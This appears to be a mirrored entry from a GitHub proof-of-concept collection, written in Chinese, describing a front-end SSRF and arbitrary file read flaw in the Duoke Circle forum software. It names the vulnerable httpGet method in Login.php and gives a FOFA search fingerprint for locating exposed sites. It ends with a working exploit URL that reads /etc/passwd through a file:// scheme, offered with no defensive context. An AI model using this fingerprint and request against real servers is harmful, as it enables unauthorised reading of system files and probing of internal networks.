mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-05-05 10:17:57 +00:00
476 B
476 B
多客圈子论坛前台SSRF漏洞
/app/api/controller/Login.php 控制器中,httpGet方法存在curl_exec函数,且传参可控,导致任意文件读取+SSRF漏洞
fofa
"/static/index/js/jweixin-1.2.0.js"
poc
/index.php/api/login/httpGet?url=file:///etc/passwd
